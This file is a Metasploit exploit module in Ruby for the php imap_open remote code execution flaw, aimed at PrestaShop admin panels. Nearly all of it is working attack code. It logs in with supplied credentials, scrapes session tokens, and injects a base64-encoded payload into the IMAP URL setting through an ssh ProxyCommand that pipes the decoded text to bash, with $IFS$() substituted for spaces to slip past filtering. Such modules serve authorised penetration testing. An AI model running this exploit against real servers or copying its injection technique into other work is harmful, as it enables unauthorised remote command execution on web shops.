metasploit-gs/modules/exploits/linux/http/php_imap_open_rce.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'php imap_open Remote Code Execution',
      'Description'     => %q{
        The imap_open function within php, if called without the /norsh flag, will attempt to preauthenticate an
        IMAP session.  On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary.  Ssh's ProxyCommand
        option can be passed from imap_open to execute arbitrary commands.
        While many custom applications may use imap_open, it is reported that the following applications are vulnerable:
        instantcms, HostCMS, e107_2, prestashop, SuiteCRM, SugarCRM.
        Prestashop exploitation requires the admin URI, and administrator credentials.
      },
      'Author' =>
        [
          'Twoster', # Vulnerability discovery and PoC
          'h00die' # Metasploit Module
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          [ 'URL', 'https://web.archive.org/web/20181118213536/https://antichat.com/threads/463395' ],
          [ 'URL', 'https://github.com/Bo0oM/PHP_imap_open_exploit' ]
        ],
      'Privileged'  => false,
      'Platform'  => [ 'unix' ],
      'Arch'  => ARCH_CMD,
      'Targets' =>
        [
          [ 'prestashop', {} ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 19 2018'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base directory path", '/admin2769gx8k3']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", '']),
        OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
      ])
  end

  def check
   if target.name =~ /prestashop/
      uri = normalize_uri(target_uri.path)
      res = send_request_cgi({'uri' => uri})
      if res && (res.code == 301 || res.code == 302)
       return CheckCode::Detected
      end
   end
   CheckCode::Safe
  end

  def command
    #payload is base64 encoded, and stuffed into the SSH option.
    enc_payload = Rex::Text.encode_base64(payload.encoded)
    command = "-oProxyCommand=`echo #{enc_payload}|base64 -d|bash`"
    #final payload can not contain spaces, however $IFS$() will return the space we require
    command.gsub!(' ', '$IFS$()')
  end

  def exploit
    if target.name =~ /prestashop/
      uri = normalize_uri(target_uri.path)
      res = send_request_cgi({'uri' => uri})
      if res && res.code != 301
        print_error('Admin redirect not found, check URI.  Should be something similar to /admin2769gx8k3')
        return
      end

      #There are a bunch of redirects that happen, so we automate going through them to get to the login page.
      while res.code == 301 || res.code == 302
        cookie = res.get_cookies
        uri = res.headers['Location']
        vprint_status("Redirected to #{uri}")
        res = send_request_cgi({'uri' => uri})
      end

      #Tokens are generated for each URL or sub-component, we need valid ones!
      /.*token=(?<token>\w{32})/ =~ uri
      /id="redirect" value="(?<redirect>.*)"\/>/ =~ res.body
      cookie = res.get_cookies
      vprint_status("Token: #{token} and Login Redirect: #{redirect}")
      print_status("Logging in with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
      res = send_request_cgi(
        'method' => 'POST',
        'uri'    => normalize_uri(target_uri.path) + '/index.php',
        'cookie' => cookie,
        'vars_post' => {
          'ajax' => 1,
          'token' => '',
          'controller' => 'AdminLogin',
          'submitLogin' => '1',
          'passwd' => datastore['PASSWORD'],
          'email' => datastore['USERNAME'],
          'redirect' => redirect
        },
        'vars_get' => {
          'rand' => '1542582364810' #not sure if this will hold true forever, I didn't see where it is being generated
        }
      )
      if res && res.body.include?('Invalid password')
        print_error('Invalid Login')
        return
      end
      vprint_status("Login JSON Response: #{res.body}")
      uri = JSON.parse(res.body)['redirect']
      cookie = res.get_cookies
      print_good('Login Success, loading admin dashboard to pull tokens')
      res = send_request_cgi({'uri' => uri, 'cookie' => cookie})
      #print_status(res.code.to_s)
      #if res.code == 301 || res.code == 302
      #  print_status("#{res.code} -> #{res.headers['Location']}")
      #  cookie = res.get_cookies
      #  uri = res.headers['Location']
      #  res = send_request_cgi({'uri' => uri, 'cookie' => cookie})
      #end

      /AdminCustomerThreads&amp;token=(?<token>\w{32})/ =~ res.body
      vprint_status("Customer Threads Token: #{token}")
      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path) + '/index.php',
        'cookie' => cookie,
        'vars_get' => {
          'controller' => 'AdminCustomerThreads',
          'token' => token
        }
      })

      /form method="post" action="index\.php\?controller=AdminCustomerThreads&amp;token=(?<token>\w{32})/ =~ res.body
      print_good("Sending Payload with Final Token: #{token}")
      data = Rex::MIME::Message.new
      data.add_part('1', nil, nil, 'form-data; name="PS_CUSTOMER_SERVICE_FILE_UPLOAD"')
      data.add_part("Dear Customer,\n\nRegards,\nCustomer service", nil, nil, 'form-data; name="PS_CUSTOMER_SERVICE_SIGNATURE_1"')
      data.add_part("x #{command}}", nil, nil, 'form-data; name="PS_SAV_IMAP_URL"')
      data.add_part('143', nil, nil, 'form-data; name="PS_SAV_IMAP_PORT"')
      data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name="PS_SAV_IMAP_USER"')
      data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name="PS_SAV_IMAP_PWD"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_DELETE_MSG"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_CREATE_THREADS"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_POP3"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NORSH"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_SSL"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_VALIDATE-CERT"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NOVALIDATE-CERT"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_TLS"')
      data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NOTLS"')
      data.add_part('', nil, nil, 'form-data; name="submitOptionscustomer_thread"')

      send_request_cgi(
        'method' => 'POST',
        'uri'    => normalize_uri(target_uri.path) + '/index.php',
        'ctype'  => "multipart/form-data; boundary=#{data.bound}",
        'data'   => data.to_s,
        'cookie' => cookie,
        'vars_get' => {
          'controller' => 'AdminCustomerThreads',
          'token' => token
        }
      )

      if res && res.body.include?('imap Is Not Installed On This Server')
        print_error('PHP IMAP mod not installed/enabled ')
      end
    end
  end
end